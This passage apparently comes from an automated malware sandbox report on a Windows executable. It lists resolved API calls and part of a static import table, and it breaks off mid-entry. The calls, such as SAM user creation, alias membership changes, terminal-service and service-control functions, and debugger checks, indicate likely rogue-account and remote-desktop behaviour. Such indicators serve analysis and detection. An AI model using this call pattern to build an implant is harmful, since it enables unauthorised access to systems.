  1674. "ntdll.dll._aulldvrm",
  1675. "ntdll.dll.NlsAnsiCodePage",
  1676. "ntdll.dll.RtlImageNtHeader",
  1677. "ntdll.dll.RtlSetLastWin32Error",
  1678. "ntdll.dll.NtClose",
  1679. "ntdll.dll.NtQueryValueKey",
  1680. "ntdll.dll.swprintf_s",
  1681. "ntdll.dll.RtlInitUnicodeString",
  1682. "ntdll.dll.RtlUnicodeStringToInteger",
  1683. "gdi32.dll.GetClipRgn",
  1684. "gdi32.dll.ExtSelectClipRgn",
  1685. "gdi32.dll.GetHFONT",
  1686. "gdi32.dll.GetMapMode",
  1687. "gdi32.dll.SetGraphicsMode",
  1688. "gdi32.dll.GetClipBox",
  1689. "gdi32.dll.CreateRectRgn",
  1690. "gdi32.dll.CreateRectRgnIndirect",
  1691. "gdi32.dll.SetLayout",
  1692. "gdi32.dll.GetBoundsRect",
  1693. "gdi32.dll.ExcludeClipRect",
  1694. "gdi32.dll.PlayEnhMetaFile",
  1695. "gdi32.dll.Ellipse",
  1696. "gdi32.dll.CreateEllipticRgn",
  1697. "gdi32.dll.GdiFixUpHandle",
  1698. "gdi32.dll.CreatePen",
  1699. "gdi32.dll.Rectangle",
  1700. "gdi32.dll.GetTextCharacterExtra",
  1701. "gdi32.dll.SetTextCharacterExtra",
  1702. "gdi32.dll.GetCurrentObject",
  1703. "gdi32.dll.GetViewportOrgEx",
  1704. "gdi32.dll.SetViewportOrgEx",
  1705. "gdi32.dll.PolyPatBlt",
  1706. "gdi32.dll.CreateBrushIndirect",
  1707. "gdi32.dll.SetBoundsRect",
  1708. "gdi32.dll.CopyEnhMetaFileW",
  1709. "gdi32.dll.CopyMetaFileW",
  1710. "gdi32.dll.GetPaletteEntries",
  1711. "gdi32.dll.CreatePalette",
  1712. "gdi32.dll.SetPaletteEntries",
  1713. "gdi32.dll.GetPixel",
  1714. "gdi32.dll.ExtTextOutA",
  1715. "gdi32.dll.GetTextCharsetInfo",
  1716. "gdi32.dll.QueryFontAssocStatus",
  1717. "gdi32.dll.GetCharWidthInfo",
  1718. "gdi32.dll.GetCharWidthA",
  1719. "gdi32.dll.GetTextFaceW",
  1720. "gdi32.dll.GetCharABCWidthsA",
  1721. "gdi32.dll.GetCharABCWidthsW",
  1722. "gdi32.dll.SetBrushOrgEx",
  1723. "gdi32.dll.CreateFontIndirectW",
  1724. "gdi32.dll.EnumFontsW",
  1725. "gdi32.dll.GetTextFaceAliasW",
  1726. "gdi32.dll.GetTextMetricsW",
  1727. "gdi32.dll.GetTextColor",
  1728. "gdi32.dll.GdiGetCodePage",
  1729. "gdi32.dll.GetTextCharset",
  1730. "gdi32.dll.GetBkMode",
  1731. "gdi32.dll.GetViewportExtEx",
  1732. "gdi32.dll.GetWindowExtEx",
  1733. "gdi32.dll.GdiGetCharDimensions",
  1734. "gdi32.dll.GdiPrinterThunk",
  1735. "gdi32.dll.GdiLoadType1Fonts",
  1736. "gdi32.dll.GdiAddFontResourceW",
  1737. "gdi32.dll.SaveDC",
  1738. "gdi32.dll.OffsetWindowOrgEx",
  1739. "gdi32.dll.RestoreDC",
  1740. "gdi32.dll.ExtTextOutW",
  1741. "gdi32.dll.GetDIBits",
  1742. "gdi32.dll.CreateDIBSection",
  1743. "gdi32.dll.SetStretchBltMode",
  1744. "gdi32.dll.SelectPalette",
  1745. "gdi32.dll.RealizePalette",
  1746. "gdi32.dll.SetDIBits",
  1747. "gdi32.dll.CreateDCW",
  1748. "gdi32.dll.CreateDIBitmap",
  1749. "gdi32.dll.CreateCompatibleBitmap",
  1750. "gdi32.dll.SetBitmapBits",
  1751. "gdi32.dll.DeleteDC",
  1752. "gdi32.dll.GdiValidateHandle",
  1753. "gdi32.dll.GdiDllInitialize",
  1754. "gdi32.dll.GdiProcessSetup",
  1755. "gdi32.dll.GetStockObject",
  1756. "gdi32.dll.CreateSolidBrush",
  1757. "gdi32.dll.CreateCompatibleDC",
  1758. "gdi32.dll.GdiConvertBitmapV5",
  1759. "gdi32.dll.GdiCreateLocalEnhMetaFile",
  1760. "gdi32.dll.GdiCreateLocalMetaFilePict",
  1761. "gdi32.dll.GetRgnBox",
  1762. "gdi32.dll.CombineRgn",
  1763. "gdi32.dll.OffsetRgn",
  1764. "gdi32.dll.MirrorRgn",
  1765. "gdi32.dll.EnableEUDC",
  1766. "gdi32.dll.GdiConvertToDevmodeW",
  1767. "gdi32.dll.GetTextExtentPointA",
  1768. "gdi32.dll.GetTextExtentPointW",
  1769. "gdi32.dll.CreateBitmap",
  1770. "gdi32.dll.SetTextAlign",
  1771. "gdi32.dll.GetTextAlign",
  1772. "gdi32.dll.IntersectClipRect",
  1773. "gdi32.dll.SelectObject",
  1774. "gdi32.dll.SetBkMode",
  1775. "gdi32.dll.GetBkColor",
  1776. "gdi32.dll.GetObjectW",
  1777. "gdi32.dll.SetTextColor",
  1778. "gdi32.dll.SetBkColor",
  1779. "gdi32.dll.GetLayout",
  1780. "gdi32.dll.StretchDIBits",
  1781. "gdi32.dll.GetDeviceCaps",
  1782. "gdi32.dll.GetDIBColorTable",
  1783. "gdi32.dll.GdiGetBitmapBitsSize",
  1784. "gdi32.dll.DeleteObject",
  1785. "gdi32.dll.DeleteMetaFile",
  1786. "gdi32.dll.DeleteEnhMetaFile",
  1787. "gdi32.dll.GdiConvertMetaFilePict",
  1788. "gdi32.dll.GdiConvertEnhMetaFile",
  1789. "gdi32.dll.GdiReleaseDC",
  1790. "gdi32.dll.StretchBlt",
  1791. "gdi32.dll.GetObjectType",
  1792. "gdi32.dll.GdiConvertAndCheckDC",
  1793. "gdi32.dll.SetRectRgn",
  1794. "gdi32.dll.BitBlt",
  1795. "gdi32.dll.TextOutW",
  1796. "gdi32.dll.TextOutA",
  1797. "gdi32.dll.PatBlt",
  1798. "gdi32.dll.SetLayoutWidth",
  1799. "kernel32.dll.GetLocaleInfoW",
  1800. "kernel32.dll.SetUnhandledExceptionFilter",
  1801. "kernel32.dll.UnhandledExceptionFilter",
  1802. "kernel32.dll.GetSystemTimeAsFileTime",
  1803. "kernel32.dll.LoadLibraryExA",
  1804. "kernel32.dll.InterlockedCompareExchange",
  1805. "kernel32.dll.DelayLoadFailureHook",
  1806. "kernel32.dll.GlobalAddAtomA",
  1807. "kernel32.dll.GlobalFindAtomA",
  1808. "kernel32.dll.QueryPerformanceFrequency",
  1809. "kernel32.dll.QueryPerformanceCounter",
  1810. "kernel32.dll.LCMapStringW",
  1811. "kernel32.dll.CreateFileMappingW",
  1812. "kernel32.dll.MapViewOfFile",
  1813. "kernel32.dll.WerpNotifyLoadStringResource",
  1814. "kernel32.dll.GetSystemDefaultLangID",
  1815. "kernel32.dll.RegQueryInfoKeyW",
  1816. "kernel32.dll.RegEnumValueW",
  1817. "kernel32.dll.RegOpenKeyExW",
  1818. "kernel32.dll.RegQueryValueExW",
  1819. "kernel32.dll.IsDBCSLeadByte",
  1820. "kernel32.dll.WerpNotifyUseStringResource",
  1821. "kernel32.dll.ProcessIdToSessionId",
  1822. "kernel32.dll.MulDiv",
  1823. "kernel32.dll.GetThreadLocale",
  1824. "kernel32.dll.ConvertDefaultLocale",
  1825. "kernel32.dll.IsValidLocale",
  1826. "kernel32.dll.GetAtomNameW",
  1827. "kernel32.dll.GetAtomNameA",
  1828. "kernel32.dll.AddAtomW",
  1829. "kernel32.dll.AddAtomA",
  1830. "kernel32.dll.EnumResourceNamesExW",
  1831. "kernel32.dll.SetFileTime",
  1832. "kernel32.dll.CompareStringW",
  1833. "kernel32.dll.GetCPInfo",
  1834. "kernel32.dll.GetStringTypeA",
  1835. "kernel32.dll.GetStringTypeW",
  1836. "kernel32.dll.FoldStringW",
  1837. "kernel32.dll.GlobalHandle",
  1838. "kernel32.dll.GetExitCodeThread",
  1839. "kernel32.dll.ExitThread",
  1840. "kernel32.dll.GetCurrentThread",
  1841. "kernel32.dll.GlobalAddAtomW",
  1842. "kernel32.dll.SearchPathW",
  1843. "kernel32.dll.IsDBCSLeadByteEx",
  1844. "kernel32.dll.DisableThreadLibraryCalls",
  1845. "kernel32.dll.FindResourceExA",
  1846. "kernel32.dll.FindResourceExW",
  1847. "kernel32.dll.LoadStringBaseExW",
  1848. "kernel32.dll.RegisterWaitForInputIdle",
  1849. "kernel32.dll.QueryActCtxSettingsW",
  1850. "kernel32.dll.LoadAppInitDlls",
  1851. "kernel32.dll.LocalSize",
  1852. "kernel32.dll.LocalUnlock",
  1853. "kernel32.dll.LocalLock",
  1854. "kernel32.dll.LocalReAlloc",
  1855. "kernel32.dll.InterlockedIncrement",
  1856. "kernel32.dll.RegSetValueExW",
  1857. "kernel32.dll.RegCloseKey",
  1858. "kernel32.dll.RegCreateKeyExW",
  1859. "kernel32.dll.RegDeleteKeyExW",
  1860. "kernel32.dll.GetUserDefaultLCID",
  1861. "kernel32.dll.GlobalUnlock",
  1862. "kernel32.dll.GlobalLock",
  1863. "kernel32.dll.GlobalSize",
  1864. "kernel32.dll.GlobalDeleteAtom",
  1865. "kernel32.dll.DeleteAtom",
  1866. "kernel32.dll.InterlockedExchange",
  1867. "kernel32.dll.GlobalGetAtomNameA",
  1868. "kernel32.dll.GlobalGetAtomNameW",
  1869. "kernel32.dll.GlobalFree",
  1870. "kernel32.dll.InterlockedDecrement",
  1871. "kernel32.dll.GlobalFlags",
  1872. "kernel32.dll.GetOEMCP",
  1873. "kernel32.dll.GlobalReAlloc",
  1874. "kernel32.dll.WaitForMultipleObjectsEx",
  1875. "kernel32.dll.lstrcmpiW",
  1876. "kernel32.dll.WritePrivateProfileStringW",
  1877. "kernel32.dll.GlobalFindAtomW",
  1878. "urlmon.dll.CoInternetCreateSecurityManager",
  1879. "urlmon.dll.CoInternetCreateZoneManager",
  1880. "urlmon.dll.CoInternetIsFeatureEnabledForUrl",
  1881. "samlib.dll.SamConnect",
  1882. "rpcrt4.dll.RpcStringBindingComposeW",
  1883. "rpcrt4.dll.RpcStringFreeW",
  1884. "samlib.dll.SamEnumerateDomainsInSamServer",
  1885. "samlib.dll.SamLookupDomainInSamServer",
  1886. "samlib.dll.SamFreeMemory",
  1887. "samlib.dll.SamOpenDomain",
  1888. "samlib.dll.SamCreateUser2InDomain",
  1889. "samlib.dll.SamQueryInformationUser",
  1890. "samlib.dll.SamSetInformationUser",
  1891. "cryptbase.dll.SystemFunction028",
  1892. "rpcrt4.dll.NDRCContextBinding",
  1893. "rpcrt4.dll.RpcBindingToStringBindingW",
  1894. "rpcrt4.dll.I_RpcMapWin32Status",
  1895. "rpcrt4.dll.RpcStringBindingParseW",
  1896. "samlib.dll.SamCloseHandle",
  1897. "sechost.dll.LookupAccountSidLocalW",
  1898. "advapi32.dll.LsaOpenPolicy",
  1899. "advapi32.dll.LsaLookupNames2",
  1900. "advapi32.dll.LsaClose",
  1901. "advapi32.dll.LsaFreeMemory",
  1902. "samlib.dll.SamLookupNamesInDomain",
  1903. "samlib.dll.SamOpenAlias",
  1904. "samlib.dll.SamAddMemberToAlias",
  1905. "linkinfo.dll.IsValidLinkInfo",
  1906. "propsys.dll.#417",
  1907. "propsys.dll.PSGetNameFromPropertyKey",
  1908. "propsys.dll.PSStringFromPropertyKey",
  1909. "propsys.dll.InitVariantFromBuffer",
  1910. "propsys.dll.PropVariantToGUID",
  1911. "advapi32.dll.GetSecurityInfo",
  1912. "advapi32.dll.SetSecurityInfo",
  1913. "advapi32.dll.GetSecurityDescriptorControl",
  1914. "kernel32.dll.CopyFileExW",
  1915. "kernel32.dll.IsDebuggerPresent",
  1916. "kernel32.dll.SetConsoleInputExeNameW",
  1917. "ole32.dll.CoInitializeSecurity",
  1918. "sechost.dll.LookupAccountNameLocalW",
  1919. "kernel32.dll.CreateEventExW",
  1920. "kernel32.dll.CreateSemaphoreExW",
  1921. "kernel32.dll.CreateThreadpoolTimer",
  1922. "kernel32.dll.SetThreadpoolTimer",
  1923. "kernel32.dll.WaitForThreadpoolTimerCallbacks",
  1924. "kernel32.dll.CloseThreadpoolTimer",
  1925. "kernel32.dll.CreateThreadpoolWait",
  1926. "kernel32.dll.SetThreadpoolWait",
  1927. "kernel32.dll.CloseThreadpoolWait",
  1928. "kernel32.dll.FreeLibraryWhenCallbackReturns",
  1929. "kernel32.dll.GetCurrentProcessorNumber",
  1930. "kernel32.dll.GetLogicalProcessorInformation",
  1931. "kernel32.dll.CreateSymbolicLinkW",
  1932. "kernel32.dll.EnumSystemLocalesEx",
  1933. "kernel32.dll.CompareStringEx",
  1934. "kernel32.dll.GetDateFormatEx",
  1935. "kernel32.dll.GetLocaleInfoEx",
  1936. "kernel32.dll.GetTimeFormatEx",
  1937. "kernel32.dll.IsValidLocaleName",
  1938. "kernel32.dll.GetTickCount64",
  1939. "sqlmap.dll.ServiceMain",
  1940. "sqlmap.dll.SvchostPushServiceGlobals",
  1941. "termsrv.dll.ServiceMain",
  1942. "termsrv.dll.SvchostPushServiceGlobals",
  1943. "ole32.dll.CoFreeUnusedLibrariesEx",
  1944. "ole32.dll.CoRegisterClassObject",
  1945. "rpcrtremote.dll.I_RpcExtInitializeExtensionPoint",
  1946. "ole32.dll.CoGetClassObject",
  1947. "ole32.dll.CoGetMarshalSizeMax",
  1948. "ole32.dll.CoMarshalInterface",
  1949. "ole32.dll.CoUnmarshalInterface",
  1950. "ole32.dll.StringFromIID",
  1951. "ole32.dll.CoGetPSClsid",
  1952. "ole32.dll.CoReleaseMarshalData",
  1953. "ole32.dll.DcomChannelSetHResult",
  1954. "ole32.dll.CoImpersonateClient",
  1955. "advapi32.dll.OpenThreadToken",
  1956. "ole32.dll.CoRevertToSelf",
  1957. "advapi32.dll.QueryTraceW",
  1958. "lsmproxy.dll.DllGetClassObject",
  1959. "lsmproxy.dll.DllCanUnloadNow",
  1960. "regapi.dll.RegGetMachinePolicyEx",
  1961. "secur32.dll.InitSecurityInterfaceW",
  1962. "cryptsp.dll.SystemFunction035",
  1963. "user32.dll.LoadStringW",
  1964. "ole32.dll.CLSIDFromString",
  1965. "regapi.dll.RegQueryListenerStart",
  1966. "rdpwsx.dll.WsxInitialize",
  1967. "rdpwsx.dll.WsxDestroy",
  1968. "rdpwsx.dll.WsxConnect",
  1969. "rdpwsx.dll.WsxDisconnect",
  1970. "rdpwsx.dll.WsxInitializeClientData",
  1971. "rdpwsx.dll.WsxConvertPublishedApp",
  1972. "rdpwsx.dll.WsxWinStationInitialize",
  1973. "rdpwsx.dll.WsxWinStationRundown",
  1974. "rdpwsx.dll.WsxVirtualChannelSecurity",
  1975. "rdpwsx.dll.WsxIcaStackIoControl",
  1976. "rdpwsx.dll.WsxBrokenConnection",
  1977. "rdpwsx.dll.WsxLogonNotify",
  1978. "rdpwsx.dll.WsxSetErrorInfo",
  1979. "rdpwsx.dll.WsxSendAutoReconnectStatus",
  1980. "rdpwsx.dll.WsxEscape",
  1981. "rdpwsx.dll.WsxOpenVirtualChannel",
  1982. "rdpwsx.dll.WsxCanLogonProceed",
  1983. "rdpwsx.dll.WsxGetConnectionProperty",
  1984. "rdpwsx.dll.WsxAutomationVerification",
  1985. "rdpwsx.dll.WsxVerify",
  1986. "rdpwsx.dll.WsxExchangeStackConfig",
  1987. "rdpwsx.dll.WsxQueryGatewayPolicies",
  1988. "sechost.dll.OpenSCManagerW",
  1989. "sechost.dll.OpenServiceW",
  1990. "sechost.dll.StartServiceW",
  1991. "sechost.dll.CloseServiceHandle",
  1992. "crypt32.dll.CryptProtectData",
  1993. "cryptbase.dll.SystemFunction040",
  1994. "rpcrt4.dll.NdrClientCall3",
  1995. "sechost.dll.ControlService",
  1996. "umrdp.dll.ServiceMain",
  1997. "umrdp.dll.SvchostPushServiceGlobals",
  1998. "sechost.dll.RegisterServiceCtrlHandlerExW",
  1999. "sechost.dll.SetServiceStatus",
  2000. "sechost.dll.QueryServiceStatus",
  2001. "setupapi.dll.SetupDiGetClassDevsW",
  2002. "setupapi.dll.SetupDiEnumDeviceInterfaces",
  2003. "setupapi.dll.SetupDiEnumDeviceInfo",
  2004. "setupapi.dll.SetupDiGetDeviceRegistryPropertyW",
  2005. "setupapi.dll.SetupDiGetDeviceInterfaceDetailW",
  2006. "setupapi.dll.SetupDiDestroyDeviceInfoList",
  2007. "ole32.dll.CLSIDFromProgID",
  2008. "rpcrt4.dll.RpcServerUseProtseqEpW",
  2009. "rpcrt4.dll.RpcServerRegisterIfEx",
  2010. "rpcrt4.dll.RpcServerListen",
  2011. "rpcrt4.dll.RpcServerUnregisterIfEx",
  2012. "setupapi.dll.SetupDiOpenDevRegKey",
  2013. "rpcrt4.dll.RpcServerUnregisterIf"
  2014. ]
  2015.  
  2016. [*] Static Analysis: {
  2017. "pe": {
  2018. "peid_signatures": null,
  2019. "imports": [
  2020. {
  2021. "imports": [
  2022. {
  2023. "name": "FlushFileBuffers",
  2024. "address": "0x43603c"
  2025. },
  2026. {
  2027. "name": "GetConsoleCP",
  2028. "address": "0x436040"
  2029. },
  2030. {
  2031. "name": "GetConsoleMode",
  2032. "address": "0x436044"
  2033. },
  2034. {
  2035. "name": "HeapSize",
  2036. "address": "0x436048"
  2037. },
  2038. {
  2039. "name": "HeapReAlloc",
  2040. "address": "0x43604c"
  2041. },
  2042. {
  2043. "name": "GetProcessHeap",
  2044. "address": "0x436050"
  2045. },
  2046. {
  2047. "name": "SetFilePointerEx",
  2048. "address": "0x436054"
  2049. },
  2050. {
  2051. "name": "WriteConsoleW",
  2052. "address": "0x436058"
  2053. },
  2054. {
  2055. "name": "GetStringTypeW",
  2056. "address": "0x43605c"
  2057. },
  2058. {
  2059. "name": "SetStdHandle",
  2060. "address": "0x436060"
  2061. },
  2062. {
  2063. "name": "CreateFileW",
  2064. "address": "0x436064"
  2065. },
  2066. {
  2067. "name": "AllocConsole",
  2068. "address": "0x436068"
  2069. },
  2070. {
  2071. "name": "GetGeoInfoA",
  2072. "address": "0x43606c"
  2073. },
  2074. {
  2075. "name": "K32EnumPageFilesW",
  2076. "address": "0x436070"
  2077. },
  2078. {
  2079. "name": "DefineDosDeviceW",
  2080. "address": "0x436074"
  2081. },
  2082. {
  2083. "name": "Sleep",
  2084. "address": "0x436078"
  2085. },
  2086. {
  2087. "name": "FreeEnvironmentStringsW",
  2088. "address": "0x43607c"
  2089. },
  2090. {
  2091. "name": "GetEnvironmentStringsW",
  2092. "address": "0x436080"
  2093. },
  2094. {
  2095. "name": "GetCommandLineW",
  2096. "address": "0x436084"
  2097. },
  2098. {
  2099. "name": "GetCommandLineA",
  2100. "address": "0x436088"
  2101. },
  2102. {
  2103. "name": "GetCPInfo",
  2104. "address": "0x43608c"
  2105. },
  2106. {
  2107. "name": "GetOEMCP",
  2108. "address": "0x436090"
  2109. },
  2110. {
  2111. "name": "IsValidCodePage",
  2112. "address": "0x436094"
  2113. },
  2114. {
  2115. "name": "FindNextFileA",
  2116. "address": "0x436098"
  2117. },
  2118. {
  2119. "name": "VirtualProtect",
  2120. "address": "0x43609c"
  2121. },
  2122. {
  2123. "name": "VirtualAlloc",
  2124. "address": "0x4360a0"
  2125. },
  2126. {
  2127. "name": "FindFirstFileExA",
  2128. "address": "0x4360a4"
  2129. },
  2130. {
  2131. "name": "FindClose",
  2132. "address": "0x4360a8"
  2133. },
  2134. {
  2135. "name": "CloseHandle",
  2136. "address": "0x4360ac"
  2137. },
  2138. {
  2139. "name": "GetFileType",
  2140. "address": "0x4360b0"
  2141. },
  2142. {
  2143. "name": "LCMapStringW",
  2144. "address": "0x4360b4"
  2145. },
  2146. {
  2147. "name": "HeapFree",
  2148. "address": "0x4360b8"
  2149. },
  2150. {
  2151. "name": "HeapAlloc",
  2152. "address": "0x4360bc"
  2153. },
  2154. {
  2155. "name": "GetACP",
  2156. "address": "0x4360c0"
  2157. },
  2158. {
  2159. "name": "GetModuleHandleExW",
  2160. "address": "0x4360c4"
  2161. },
  2162. {
  2163. "name": "ExitProcess",
  2164. "address": "0x4360c8"
  2165. },
  2166. {
  2167. "name": "WideCharToMultiByte",
  2168. "address": "0x4360cc"
  2169. },
  2170. {
  2171. "name": "MultiByteToWideChar",
  2172. "address": "0x4360d0"
  2173. },
  2174. {
  2175. "name": "GetModuleFileNameA",
  2176. "address": "0x4360d4"
  2177. },
  2178. {
  2179. "name": "WriteFile",
  2180. "address": "0x4360d8"
  2181. },
  2182. {
  2183. "name": "GetStdHandle",
  2184. "address": "0x4360dc"
  2185. },
  2186. {
  2187. "name": "RaiseException",
  2188. "address": "0x4360e0"
  2189. },
  2190. {
  2191. "name": "LoadLibraryExW",
  2192. "address": "0x4360e4"
  2193. },
  2194. {
  2195. "name": "GetProcAddress",
  2196. "address": "0x4360e8"
  2197. },
  2198. {
  2199. "name": "FreeLibrary",
  2200. "address": "0x4360ec"
  2201. },
  2202. {
  2203. "name": "TlsFree",
  2204. "address": "0x4360f0"
  2205. },
  2206. {
  2207. "name": "TlsSetValue",
  2208. "address": "0x4360f4"
  2209. },
  2210. {
  2211. "name": "TlsGetValue",
  2212. "address": "0x4360f8"
  2213. },
  2214. {
  2215. "name": "TlsAlloc",
  2216. "address": "0x4360fc"
  2217. },
  2218. {
  2219. "name": "InitializeCriticalSectionAndSpinCount",
  2220. "address": "0x436100"
  2221. },
  2222. {
  2223. "name": "DeleteCriticalSection",
  2224. "address": "0x436104"
  2225. },
  2226. {
  2227. "name": "DecodePointer",
  2228. "address": "0x436108"
  2229. },
  2230. {
  2231. "name": "UnhandledExceptionFilter",
  2232. "address": "0x43610c"
  2233. },
  2234. {
  2235. "name": "SetUnhandledExceptionFilter",
  2236. "address": "0x436110"
  2237. },
  2238. {
  2239. "name": "GetCurrentProcess",
  2240. "address": "0x436114"
  2241. },
  2242. {
  2243. "name": "TerminateProcess",
  2244. "address": "0x436118"
  2245. },
  2246. {
  2247. "name": "IsProcessorFeaturePresent",
  2248. "address": "0x43611c"
  2249. },
  2250. {
  2251. "name": "QueryPerformanceCounter",
  2252. "address": "0x436120"
  2253. },
  2254. {
  2255. "name": "GetCurrentProcessId",
  2256. "address": "0x436124"
  2257. },
  2258. {
  2259. "name": "GetCurrentThreadId",
  2260. "address": "0x436128"
  2261. },
  2262. {
  2263. "name": "GetSystemTimeAsFileTime",
  2264. "address": "0x43612c"
  2265. },
  2266. {
  2267. "name": "InitializeSListHead",
  2268. "address": "0x436130"
  2269. },
  2270. {
  2271. "name": "IsDebuggerPresent",
  2272. "address": "0x436134"
  2273. },
  2274. {
  2275. "name": "GetStartupInfoW",
  2276. "address": "0x436138"
  2277. },
  2278. {
  2279. "name": "GetModuleHandleW",
  2280. "address": "0x43613c"
  2281. },
  2282. {
  2283. "name": "RtlUnwind",
  2284. "address": "0x436140"
  2285. },
  2286. {
  2287. "name": "GetLastError",
  2288. "address": "0x436144"
  2289. },
  2290. {
  2291. "name": "SetLastError",
  2292. "address": "0x436148"
  2293. },
  2294. {
  2295. "name": "EnterCriticalSection",
  2296. "address": "0x43614c"
  2297. },
  2298. {
  2299. "name": "LeaveCriticalSection",
  2300. "address": "0x436150"
  2301. }
  2302. ],
  2303. "dll": "KERNEL32.dll"
  2304. },
  2305. {
  2306. "imports": [
  2307. {
  2308. "name": "FindWindowW",
  2309. "address": "0x4361b4"
  2310. },
  2311. {
  2312. "name": "GetTouchInputInfo",
  2313. "address": "0x4361b8"
  2314. },
  2315. {
  2316. "name": "DdeCmpStringHandles",
  2317. "address": "0x4361bc"
  2318. },
  2319. {
  2320. "name": "MessageBoxA",
  2321. "address": "0x4361c0"
  2322. }
  2323. ],
  2324. "dll": "USER32.dll"
  2325. },
  2326. {
  2327. "imports": [
  2328. {
  2329. "name": null,
  2330. "address": "0x4361e4"
  2331. }
  2332. ],
  2333. "dll": "WINSPOOL.DRV"
  2334. },
  2335. {
  2336. "imports": [
  2337. {
  2338. "name": "DuplicateToken",
  2339. "address": "0x436000"
  2340. },
  2341. {
  2342. "name": "ObjectPrivilegeAuditAlarmA",
  2343. "address": "0x436004"
  2344. },
  2345. {
  2346. "name": "PerfDecrementULongCounterValue",
  2347. "address": "0x436008"
  2348. },
  2349. {
  2350. "name": "CredUnmarshalCredentialA",
  2351. "address": "0x43600c"
  2352. }
  2353. ],
  2354. "dll": "ADVAPI32.dll"
  2355. },
  2356. {
  2357. "imports": [
  2358. {
  2359. "name": "VarBstrFromDate",
  2360. "address": "0x436170"
  2361. }
  2362. ],
  2363. "dll": "OLEAUT32.dll"
  2364. },
  2365. {
  2366. "imports": [
  2367. {
  2368. "name": "AVIStreamRelease",
  2369. "address": "0x436014"
  2370. }
  2371. ],
  2372. "dll": "AVIFIL32.dll"
  2373. },
  2374. {
  2375. "imports": [
  2376. {
  2377. "name": "DeregisterManageableLogClient",
  2378. "address": "0x4361f8"
  2379. }
  2380. ],
  2381. "dll": "clfsw32.dll"
  2382. },
  2383. {
  2384. "imports": [
  2385. {
  2386. "name": "ClusterNodeGetEnumCount",
  2387. "address": "0x43601c"
  2388. }
  2389. ],
  2390. "dll": "CLUSAPI.dll"
  2391. },
  2392. {
  2393. "imports": [
  2394. {
  2395. "name": "ImageList_AddMasked",
  2396. "address": "0x436024"
  2397. }
  2398. ],
  2399. "dll": "COMCTL32.dll"
  2400. },
  2401. {
  2402. "imports": [
  2403. {
  2404. "name": "UnDecorateSymbolNameW",
  2405. "address": "0x436200"
  2406. }
  2407. ],
  2408. "dll": "dbghelp.dll"
  2409. },
  2410. {
  2411. "imports": [
  2412. {
  2413. "name": "DnsDhcpRegisterHostAddrs",
  2414. "address": "0x43602c"
  2415. }
  2416. ],
  2417. "dll": "DNSAPI.dll"
  2418. },
  2419. {
  2420. "imports": [
  2421. {
  2422. "name": null,
  2423. "address": "0x436208"
  2424. }
  2425. ],
  2426. "dll": "dsuiext.dll"
  2427. },
  2428. {
  2429. "imports": [
  2430. {
  2431. "name": "GetMonitorContrast",
  2432. "address": "0x436210"
  2433. }
  2434. ],
  2435. "dll": "dxva2.dll"
  2436. },
  2437. {
  2438. "imports": [
  2439. {
  2440. "name": null,
  2441. "address": "0x436218"
  2442. },
  2443. {
  2444. "name": "GdipDisposeImageAttributes",
  2445. "address": "0x43621c"
  2446. },
  2447. {
  2448. "name": "GdipGetImageFlags",
  2449. "address": "0x436220"
  2450. },
  2451. {
  2452. "name": "GdipSetPathGradientPresetBlend",
  2453. "address": "0x436224"
  2454. }
  2455. ],
  2456. "dll": "gdiplus.dll"
  2457. },
  2458. {
  2459. "imports": [
  2460. {
  2461. "name": "NotifyAddrChange",
  2462. "address": "0x436034"
  2463. }
  2464. ],
  2465. "dll": "IPHLPAPI.DLL"
  2466. },
  2467. {
  2468. "imports": [
  2469. {
  2470. "name": null,
  2471. "address": "0x436158"
  2472. }
  2473. ],
  2474. "dll": "MAPI32.dll"
  2475. },
  2476. {
  2477. "imports": [
  2478. {
  2479. "name": "MprAdminInterfaceGetCredentials",
  2480. "address": "0x436160"
  2481. }
  2482. ],
  2483. "dll": "MPRAPI.dll"
  2484. },
  2485. {
  2486. "imports": [
  2487. {
  2488. "name": "DRMGetEnvironmentInfo",
  2489. "address": "0x43622c"
  2490. }
  2491. ],
  2492. "dll": "msdrm.dll"
  2493. },
  2494. {
  2495. "imports": [
  2496. {
  2497. "name": "ICInfo",
  2498. "address": "0x436168"
  2499. }
  2500. ],
  2501. "dll": "MSVFW32.dll"
  2502. },
  2503. {
  2504. "imports": [
  2505. {
  2506. "name": "glColor4sv",
  2507. "address": "0x436178"
  2508. }
  2509. ],
  2510. "dll": "OPENGL32.dll"
  2511. },
  2512. {
  2513. "imports": [
  2514. {
  2515. "name": "VariantToUInt32",
  2516. "address": "0x436180"
  2517. }
  2518. ],
  2519. "dll": "PROPSYS.dll"
  2520. },
  2521. {
  2522. "imports": [
  2523. {
  2524. "name": "ResUtilSetResourceServiceEnvironment",
  2525. "address": "0x436188"
  2526. }
  2527. ],
  2528. "dll": "RESUTILS.dll"
  2529. },
  2530. {
  2531. "imports": [
  2532. {
  2533. "name": "RpcServerListen",
  2534. "address": "0x436190"
  2535. },
  2536. {
  2537. "name": "NdrConformantStringMemorySize",
  2538. "address": "0x436194"
  2539. }
  2540. ],
  2541. "dll": "RPCRT4.dll"
  2542. },
  2543. {
  2544. "imports": [
  2545. {
  2546. "name": "MgmDeleteGroupMembershipEntry",
  2547. "address": "0x436234"
  2548. }
  2549. ],
  2550. "dll": "rtm.dll"
  2551. },
  2552. {
  2553. "imports": [
  2554. {
  2555. "name": "CM_Add_Range",
  2556. "address": "0x43619c"
  2557. }
  2558. ],
  2559. "dll": "SETUPAPI.dll"
  2560. },
  2561. {
  2562. "imports": [
  2563. {
  2564. "name": "DllRegisterWindowClasses",
  2565. "address": "0x4361a4"
  2566. }
  2567. ],
  2568. "dll": "SHDOCVW.dll"
  2569. },
  2570. {
  2571. "imports": [
  2572. {
  2573. "name": "lineGetAddressCaps",
  2574. "address": "0x4361ac"
  2575. }
  2576. ],
  2577. "dll": "TAPI32.dll"
  2578. },
  2579. {
  2580. "imports": [
  2581. {
  2582. "name": "WsCreateMessageForChannel",
  2583. "address": "0x43623c"
  2584. }
  2585. ],
  2586. "dll": "webservices.dll"
  2587. },
  2588. {
  2589. "imports": [
  2590. {
  2591. "name": "WinBioControlUnit",
  2592. "address": "0x436244"
  2593. }
  2594. ],
  2595. "dll": "winbio.dll"
  2596. },
  2597. {
  2598. "imports": [
  2599. {
  2600. "name": "IWICMetadataQueryReader_GetLocation_Proxy",
  2601. "address": "0x4361ec"
  2602. },
  2603. {
  2604. "name": "IWICImagingFactory_CreateFastMetadataEncoderFromDecoder_Proxy",
  2605. "address": "0x4361f0"
  2606. }
  2607. ],
  2608. "dll": "WindowsCodecs.dll"
  2609. },
  2610. {
  2611. "imports": [
  2612. {
  2613. "name": "WinHttpQueryOption",
